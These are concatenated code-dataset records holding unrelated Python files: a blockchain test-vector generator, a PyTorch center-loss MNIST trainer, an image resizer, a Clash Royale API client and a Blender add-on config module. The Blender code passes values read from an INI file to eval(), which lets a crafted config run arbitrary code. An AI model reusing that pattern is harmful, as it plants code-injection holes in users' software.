data in datas:\n data.sign(edPrivKey)\n data.beat(spamFilter)\n\n#Create Verifications for all 3.\nverifs: List[SignedVerification] = []\nfor data in datas:\n verifs.append(SignedVerification(data.hash, 0))\n verifs[-1].sign(0, blsPrivKey)\n\n#Create a MeritRemoval VerificationPacket for the second and third Datas which don't involve our holder.\npackets: List[SignedMeritRemovalVerificationPacket] = [\n SignedMeritRemovalVerificationPacket(\n SignedVerificationPacket(verifs[1].hash),\n [PrivateKey(1).toPublicKey().serialize()],\n PrivateKey(1).sign(verifs[1].signatureSerialize())\n ),\n SignedMeritRemovalVerificationPacket(\n SignedVerificationPacket(verifs[1].hash),\n [PrivateKey(1).toPublicKey().serialize()],\n PrivateKey(1).sign(verifs[1].signatureSerialize())\n )\n]\n\n#Create a MeritRemoval out of the conflicting Verifications.\ne1MR: SignedMeritRemoval = SignedMeritRemoval(verifs[1], packets[0], 0)\ne2MR: SignedMeritRemoval = SignedMeritRemoval(packets[1], verifs[2], 0)\n\n#Generate a Block containing the MeritRemoval for each chain.\ne1Chain.add(elements=[e1MR])\ne2Chain.add(elements=[e2MR])\n\nresult: Dict[str, Any] = {\n \"blockchains\": [e1Chain.toJSON(), e2Chain.toJSON()],\n \"datas\": [datas[0].toJSON(), datas[1].toJSON(), datas[2].toJSON()]\n}\nvectors: IO[Any] = open(\"e2e/Vectors/Consensus/MeritRemoval/HundredThirtyThree.json\", \"w\")\nvectors.write(json.dumps(result))\nvectors.close()\n", "sub_path": "e2e/Vectors/Generation/Consensus/MeritRemoval/HundredThirtyThree.py", "file_name": "HundredThirtyThree.py", "file_ext": "py", "file_size_in_byte": 2517, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "ed25519.SigningKey", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ed25519.VerifyingKey", "line_number": 19, "usage_type": "attribute"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 21, "usage_type": "name"}, {"api_name": "e2e.Libs.BLS.PublicKey", "line_number": 22, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.SpamFilter.SpamFilter", "line_number": 24, "usage_type": "name"}, {"api_name": "e2e.Vectors.Generation.PrototypeChain.PrototypeChain", "line_number": 26, "usage_type": "name"}, {"api_name": "e2e.Vectors.Generation.PrototypeChain.PrototypeChain", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "e2e.Classes.Transactions.Data.Data", "line_number": 30, "usage_type": "name"}, {"api_name": "e2e.Classes.Transactions.Data.Data", "line_number": 31, "usage_type": "call"}, {"api_name": "e2e.Classes.Transactions.Data.Data", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.Verification.SignedVerification", "line_number": 38, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.Verification.SignedVerification", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 44, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedMeritRemovalVerificationPacket", "line_number": 44, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedMeritRemovalVerificationPacket", "line_number": 45, "usage_type": "call"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedVerificationPacket", "line_number": 46, "usage_type": "call"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 47, "usage_type": "call"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 48, "usage_type": "call"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedMeritRemovalVerificationPacket", "line_number": 50, "usage_type": "call"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedVerificationPacket", "line_number": 51, "usage_type": "call"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 52, "usage_type": "call"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 53, "usage_type": "call"}, {"api_name": "e2e.Classes.Consensus.MeritRemoval.SignedMeritRemoval", "line_number": 58, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.MeritRemoval.SignedMeritRemoval", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.IO", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "445060421", "text": "import os\nimport time\nimport datetime\nimport torch\nimport torch.nn.functional as F\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom torch.utils.data import DataLoader\nfrom torch import nn\nfrom torch import optim as optim\nfrom matplotlib import pyplot as plt\n\nclass LeNets(nn.Module):\n def __init__(self):\n super(LeNets, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=1,\n out_channels=32,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.Conv2d(in_channels=32,\n out_channels=32,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.MaxPool2d(kernel_size=2,\n stride=2),\n nn.Conv2d(in_channels=32,\n out_channels=64,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.Conv2d(in_channels=64,\n out_channels=64,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.MaxPool2d(kernel_size=2,\n stride=2),\n nn.Conv2d(in_channels=64,\n out_channels=128,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.Conv2d(in_channels=128,\n out_channels=128,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.MaxPool2d(kernel_size=2,\n stride=2)\n )\n\n self.liner1 = nn.Sequential(\n nn.Linear(in_features=128 * 3 * 3,\n out_features=2),\n nn.PReLU()\n )\n self.liner2 = nn.Linear(in_features=2,\n out_features=10)\n\n def forward(self,input):\n x = self.conv1(input)\n x = x.view(-1, 128*3*3)\n Coordinate = self.liner1(x)\n Predict = self.liner2(Coordinate)\n # F.log_softmax(Predict, dim=1)\n\n return Coordinate, F.log_softmax(Predict, dim=1)\n\nclass Centerloss(nn.Module):\n def __init__(self, class_num, feat_num, iscuda):\n super(Centerloss, self).__init__()\n self.iscuda = iscuda\n self.center = nn.Parameter(torch.randn(class_num, feat_num))\n if self.iscuda:\n self.center.cuda()\n\n def forward(self, coordinate, labels):\n\n labels = labels.cpu().float()\n count = torch.histc(labels, 10, min=0, max=9).cuda()\n labels = labels.cuda()\n num = torch.index_select(count, 0, labels.long())\n centers = torch.index_select(self.center, 0, labels.long())\n loss = torch.sum(torch.sqrt(torch.sum((coordinate - centers)**2, dim=1))/num)/labels.size(0)\n return loss\n\nclass Visualization:\n def __init__(self, coordinates, labels, epoch, save_path):\n self.c = ['#ff0000', '#ffff00', '#00ff00', '#00ffff', '#0000ff',\n '#ff00ff', '#990000', '#999900', '#009900', '#009999']\n self.coordinates = coordinates\n self.labels = labels\n self.epoch = epoch\n self.save_path = save_path\n self.forward()\n\n def forward(self):\n plt.ion()\n plt.clf()\n\n for i in range(10):\n plt.title('Centerloss')\n plt.plot(self.coordinates[self.labels == i, 0], self.coordinates[self.labels == i, 1], '.', color=self.c[i])\n plt.xlim(left=-5, right=5)\n plt.ylim(bottom=-5, top=5)\n plt.text(-4, 4, 'epoch={}'.format(self.epoch))\n plt.legend(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'], loc='upper right')\n if not os.path.exists(self.save_path):\n os.mkdir(self.save_path)\n plt.savefig(os.path.join(self.save_path, 'epoch={}.jpg'.format(self.epoch)))\n plt.show()\n plt.pause(0.1)\n plt.ioff()\n\nclass Train:\n def __init__(self, path, softmaxloss_para_path, centerloss_para_path, save_path, lambda_parameters, iscuda):\n self.iscuda = iscuda\n self.lenet = LeNets()\n self.nllloss = nn.NLLLoss()\n # self.nllloss = nn.CrossEntropyLoss()\n self.centerloss = Centerloss(10, 2, self.iscuda)\n self.path = path\n self.save_path = save_path\n self.softmax_para_path = softmaxloss_para_path\n self.centerloss_para_path = centerloss_para_path\n self.lambda_parameters = lambda_parameters\n\n self.optimizernn = optim.Adam(self.lenet.parameters(), lr=0.0005)\n self.optimizerct = optim.SGD(self.centerloss.parameters(), lr=0.001)\n\n if os.path.exists(self.path):\n self.lenet.load_state_dict(torch.load(self.softmax_para_path))\n self.centerloss.load_state_dict(torch.load(self.centerloss_para_path))\n if self.iscuda:\n self.lenet.cuda()\n self.centerloss.cuda()\n self.train()\n\n def train(self):\n coordinates = []\n labels = []\n flag = 1.5\n\n for i, (data, label) in enumerate(dataloder):\n if self.iscuda:\n data = data.cuda()\n label = label.cuda()\n coordinate, predict = self.lenet(data)\n\n softmaxloss = self.nllloss(predict, label)\n centerloss = self.centerloss(coordinate, label)\n loss = softmaxloss + self.lambda_parameters * centerloss\n\n coordinates.append(coordinate)\n labels.append(label)\n\n if loss < flag:\n if not os.path.exists(self.path):\n os.mkdir(self.path)\n torch.save(self.lenet.state_dict(), self.softmax_para_path)\n torch.save(self.centerloss.state_dict(), self.centerloss_para_path)\n flag = loss\n self.optimizernn.zero_grad()\n self.optimizerct.zero_grad()\n loss.backward()\n self.optimizernn.step()\n self.optimizerct.step()\n print('训练批次:{}'.format(epoch))\n print('total_loss:', loss.item())\n print('softmaxloss:', softmaxloss.item())\n print('centerlosss:', centerloss.item())\n\n coord = torch.cat(coordinates).cpu().data.numpy()\n lab = torch.cat(labels).cpu().data.numpy()\n\n if epoch % 1 == 0:\n Visualization(coord, lab, epoch, self.save_path)\n\nif __name__ == '__main__':\n start_time = time.time()\n path = './parameters8'\n softmaxloss_para_path = './parameters8/Softmaxloss.pkl'\n centerloss_para_path = './parameters8/Centerloss.pkl'\n save_path = './images8'\n\n lambda_parameters = 1\n epoch = 0\n\n mydataset = MNIST('./MNIST', train=True, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))]), download=True)\n dataloder = DataLoader(mydataset, batch_size=128, shuffle=True, num_workers=4)\n for _ in range(100):\n train = Train(path, softmaxloss_para_path, centerloss_para_path, save_path, lambda_parameters, True)\n epoch += 1\n\n\n Train_time = (time.time() - start_time) / 60\n print('{}训练耗时:'.format('centerloss'), int(Train_time), 'minutes')\n print(datetime.datetime.now())\n", "sub_path": "centerloss_mnist.py", "file_name": "centerloss_mnist.py", "file_ext": "py", "file_size_in_byte": 7502, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.histc", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ioff", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 183, "usage_type": "call"}, {"api_name": "time.time", "line_number": 189, "usage_type": "call"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 198, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 198, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 198, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 199, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 199, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 200, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 200, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 201, "usage_type": "call"}, {"api_name": "time.time", "line_number": 207, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 209, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 209, "usage_type": "attribute"}]} +{"seq_id": "484166572", "text": "from PIL import Image\nimport numpy as np\nimport pdb\nimport os\n\ntn_size = 2e5\np_size = 1e6\n\ndef get_two_power(n):\n if n > 2:\n return 1 + get_two_power(n/2)\n else:\n return 1\n\n\nkvs = []\nfor fname in os.listdir('./'):\n if fname.endswith('.jpg') and not fname.startswith('tn-'):\n print(fname)\n fsize = os.stat(fname).st_size\n\n im = Image.open(fname)\n l, w = im.size\n\n if fsize > tn_size:\n ratio = fsize / tn_size\n two_power = get_two_power(ratio)\n two_ratio = np.sqrt(2 ** two_power)\n \n new_l = int(l/two_ratio)\n new_w = int(w/two_ratio)\n\n im2 = im.resize((new_l, new_w))\n im2.save('thumbnails/tn-' + fname)\n else:\n im.save('thumbnails/tn-' + fname)\n\n if fsize > p_size:\n ratio = fsize / p_size\n two_power = get_two_power(ratio)\n two_ratio = np.sqrt(2 ** two_power)\n\n new_l = int(l/two_ratio)\n new_w = int(w/two_ratio)\n\n im3 = im.resize((new_l, new_w))\n im3.save(fname)\n", "sub_path": "images/photos/sizer.py", "file_name": "sizer.py", "file_ext": "py", "file_size_in_byte": 1113, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "579004099", "text": "from typing import List\n\nimport requests\n\nfrom royale.models.card import Card\n\n\ndef get_all_cards() -> List[Card]:\n response = requests.get('https://statsroyale.com/api/cards')\n if response.ok:\n card_list = [Card(**card) for card in\n response.json()] # for card in response make new card by unpacking the card in the list\n return card_list\n else:\n raise Exception('Response was not ok. Status Code: ' + response.status_code)\n\n\ndef get_a_card_by_name(card_name: str) -> Card:\n cards = get_all_cards()\n card = next(card for card in cards if card.name == card_name)\n return card\n\n\n# this would be used if we only had a list of ids to do our search, would work the same as get card by name function\ndef get_a_card_by_id(card_id: int) -> Card:\n cards = get_all_cards()\n card = next(card for card in cards if card.id == card_id)\n return card\n", "sub_path": "royale/services/card_service.py", "file_name": "card_service.py", "file_ext": "py", "file_size_in_byte": 905, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 9, "usage_type": "call"}, {"api_name": "royale.models.card.Card", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "royale.models.card.Card", "line_number": 8, "usage_type": "name"}, {"api_name": "royale.models.card.Card", "line_number": 18, "usage_type": "name"}, {"api_name": "royale.models.card.Card", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "381205237", "text": "# \n\nimport bpy\nimport configparser\nfrom .w_b_scene import BlenderSceneW\nfrom . import b_tools\nfrom . import w_var\n\n\ndef set_layers_affected():\n \"\"\"Sets all layers who will be affected by wireframing and/or clay material to a list.\n\n Returns:\n A list with booleans representing all the layers that will be affected affected by\n wireframing and/or clay material.\n \"\"\"\n if w_var.cb_only_selected:\n layers_affected = [False, ]*20\n\n for obj in bpy.context.scene.objects:\n if obj.select:\n layers_affected = b_tools.manipulate_layerlists('add', layers_affected, obj.layers)\n\n else:\n layers_affected = list(w_var.original_scene.cwac.layers_affected)\n\n return layers_affected\n\n\ndef set_layers_other(layers_affected):\n \"\"\"Sets all layers who will be included in the render layer just as they are in a list.\n\n Returns:\n A list with booleans representing all the layers that will be included in the render layer just as they are.\n \"\"\"\n layers_other = list(w_var.original_scene.cwac.layers_other)\n\n for index in range(0, 20):\n if layers_other[index] and layers_affected[index]:\n layers_other[index] = False\n\n return layers_other\n\n\ndef set_variables(context):\n \"\"\"Sets variables in w_var with data from the UI, also resets some variables.\n\n Args:\n context: Scene context object.\n \"\"\"\n\n # resetting render layer names\n w_var.rlname = ''\n w_var.rlname_other = ''\n\n # resetting objects selected\n w_var.objects_affected = set()\n w_var.objects_other = set()\n w_var.objects_all_used = set()\n\n # original scene\n w_var.original_scene = context.scene\n\n # from interface:\n # wireframe type\n w_var.wireframe_method = context.scene.cwac.wireframe_method\n\n # checkboxes\n w_var.cb_backup = context.scene.cwac.cb_backup\n w_var.cb_clear_rlayers = context.scene.cwac.cb_clear_rlayers\n w_var.cb_clear_materials = context.scene.cwac.cb_clear_materials\n w_var.cb_composited = context.scene.cwac.cb_composited\n w_var.cb_only_selected = context.scene.cwac.cb_only_selected\n w_var.cb_ao = context.scene.cwac.cb_ao\n w_var.cb_clay = context.scene.cwac.cb_clay\n w_var.cb_clay_only = w_var.cb_clay_only_active and context.scene.cwac.cb_clay_only\n w_var.cb_mat_wire = w_var.cb_mat_wire_active and context.scene.cwac.cb_mat_wire\n w_var.cb_mat_clay = w_var.cb_mat_clay_active and context.scene.cwac.cb_mat_clay\n\n # colors set\n w_var.color_wire = context.scene.cwac.color_wire\n w_var.color_clay = context.scene.cwac.color_clay\n\n # materials set (names)\n w_var.mat_wire_name = context.scene.cwac.material_wire\n w_var.mat_clay_name = context.scene.cwac.material_clay\n\n # sliders\n w_var.slider_wt_freestyle = context.scene.cwac.slider_wt_freestyle\n w_var.slider_wt_modifier = context.scene.cwac.slider_wt_modifier\n\n # layers selected\n layers_affected = set_layers_affected()\n layers_other = set_layers_other(layers_affected)\n w_var.layer_numbers_affected = b_tools.layerlist_to_numberset(layers_affected)\n w_var.layer_numbers_other = b_tools.layerlist_to_numberset(layers_other)\n\n # affected and other layers together, | is logical OR operator\n w_var.layer_numbers_all_used = w_var.layer_numbers_affected | w_var.layer_numbers_other\n\n # scene name set\n w_var.scene_name_1 = context.scene.cwac.scene_name_1\n\n\ndef error_check(context):\n \"\"\"Checks for any possible errors.\n\n Args:\n context: Scene context object.\n \"\"\"\n success = True\n error_msg = \"\"\n\n scene = BlenderSceneW(context.scene, False)\n\n if w_var.cb_only_selected and not scene.check_any_selected('MESH'):\n error_msg += \"- Checkbox 'Only selected' is activated but no mesh is selected!\\n\"\n success = False\n\n # used for row alert in __init__.py\n w_var.error_101 = True\n\n if (not w_var.cb_only_selected and\n not len(w_var.layer_numbers_affected) > 0 and not len(w_var.layer_numbers_other) > 0):\n error_msg += \"- No layers selected! Maybe you forgot to use 'Only selected'?\\n\"\n success = False\n\n if w_var.cb_mat_wire and w_var.mat_wire_name == '':\n error_msg += '- No wireframe material selected!\\n'\n success = False\n\n if w_var.cb_mat_clay and w_var.mat_clay_name == '':\n error_msg += '- No clay material selected!\\n'\n success = False\n\n if len(w_var.scene_name_1) == 0:\n error_msg += '- No wireframe/clay scene name!\\n'\n success = False\n\n # used for row alert in __init__.py\n w_var.error_301 = True\n\n return success, error_msg\n\n\ndef config_load(context, filepath):\n \"\"\"Loads an INI config file from filepath.\"\"\"\n\n config = configparser.ConfigParser()\n config.read(filepath)\n\n if 'WIREFRAME TYPE' in config and 'wireframe_method' in config['WIREFRAME TYPE']:\n context.scene.cwac.wireframe_method = config['WIREFRAME TYPE']['wireframe_method']\n\n if 'CHECKBOXES' in config:\n if 'cb_backup' in config['CHECKBOXES']:\n context.scene.cwac.cb_backup = eval(config['CHECKBOXES']['cb_backup'])\n\n if 'cb_clear_rlayers' in config['CHECKBOXES']:\n context.scene.cwac.cb_clear_rlayers = eval(config['CHECKBOXES']['cb_clear_rlayers'])\n\n if 'cb_clear_materials' in config['CHECKBOXES']:\n context.scene.cwac.cb_clear_materials = eval(config['CHECKBOXES']['cb_clear_materials'])\n\n if 'cb_composited' in config['CHECKBOXES']:\n context.scene.cwac.cb_composited = eval(config['CHECKBOXES']['cb_composited'])\n\n if 'cb_only_selected' in config['CHECKBOXES']:\n context.scene.cwac.cb_only_selected = eval(config['CHECKBOXES']['cb_only_selected'])\n\n if 'cb_ao' in config['CHECKBOXES']:\n context.scene.cwac.cb_ao = eval(config['CHECKBOXES']['cb_ao'])\n\n if 'cb_clay' in config['CHECKBOXES']:\n context.scene.cwac.cb_clay = eval(config['CHECKBOXES']['cb_clay'])\n\n if 'cb_clay_only' in config['CHECKBOXES']:\n context.scene.cwac.cb_clay_only = eval(config['CHECKBOXES']['cb_clay_only'])\n\n if 'cb_mat_wire' in config['CHECKBOXES']:\n context.scene.cwac.cb_mat_wire = eval(config['CHECKBOXES']['cb_mat_wire'])\n\n if 'cb_mat_clay' in config['CHECKBOXES']:\n context.scene.cwac.cb_mat_clay = eval(config['CHECKBOXES']['cb_mat_clay'])\n\n if 'COLORS SET' in config:\n if 'color_wireframe' in config['COLORS SET']:\n context.scene.cwac.color_wire = eval(config['COLORS SET']['color_wireframe'])\n\n if 'color_clay' in config['COLORS SET']:\n context.scene.cwac.color_clay = eval(config['COLORS SET']['color_clay'])\n\n if 'MATERIALS SET' in config:\n if 'wireframe' in config['MATERIALS SET']:\n if config['MATERIALS SET']['wireframe'] in bpy.data.materials:\n context.scene.cwac.material_wire = config['MATERIALS SET']['wireframe']\n\n if 'clay' in config['MATERIALS SET']:\n if config['MATERIALS SET']['clay'] in bpy.data.materials:\n context.scene.cwac.material_clay = config['MATERIALS SET']['clay']\n\n if 'SLIDERS' in config:\n if 'slider_wt_freestyle' in config['SLIDERS']:\n context.scene.cwac.slider_wt_freestyle = eval(config['SLIDERS']['slider_wt_freestyle'])\n\n if 'slider_wt_modifier' in config['SLIDERS']:\n context.scene.cwac.slider_wt_modifier = eval(config['SLIDERS']['slider_wt_modifier'])\n\n if 'LAYERS SELECTED' in config:\n if 'layers_affected' in config['LAYERS SELECTED']:\n context.scene.cwac.layers_affected = eval(config['LAYERS SELECTED']['layers_affected'])\n\n if 'layers_other' in config['LAYERS SELECTED']:\n context.scene.cwac.layers_other = eval(config['LAYERS SELECTED']['layers_other'])\n\n if 'SCENE NAME SET' in config:\n if 'scene_name_1' in config['SCENE NAME SET']:\n context.scene.cwac.scene_name_1 = config['SCENE NAME SET']['scene_name_1']\n\n\ndef config_save(context, filepath):\n \"\"\"Saves an INI config file to filepath.\"\"\"\n\n config = configparser.ConfigParser()\n\n config['WIREFRAME TYPE'] = {'wireframe_method': context.scene.cwac.wireframe_method}\n\n config['CHECKBOXES'] = {'cb_backup': context.scene.cwac.cb_backup,\n 'cb_clear_rlayers': context.scene.cwac.cb_clear_rlayers,\n 'cb_clear_materials': context.scene.cwac.cb_clear_materials,\n 'cb_composited': context.scene.cwac.cb_composited,\n 'cb_only_selected': context.scene.cwac.cb_only_selected,\n 'cb_ao': context.scene.cwac.cb_ao,\n 'cb_clay': context.scene.cwac.cb_clay,\n 'cb_clay_only': context.scene.cwac.cb_clay_only,\n 'cb_mat_wire': context.scene.cwac.cb_mat_wire,\n 'cb_mat_clay': context.scene.cwac.cb_mat_clay}\n\n config['COLORS SET'] = {'color_wireframe': list(context.scene.cwac.color_wire),\n 'color_clay': list(context.scene.cwac.color_clay)}\n\n config['MATERIALS SET'] = {'wireframe': context.scene.cwac.material_wire,\n 'clay': context.scene.cwac.material_clay}\n\n config['SLIDERS'] 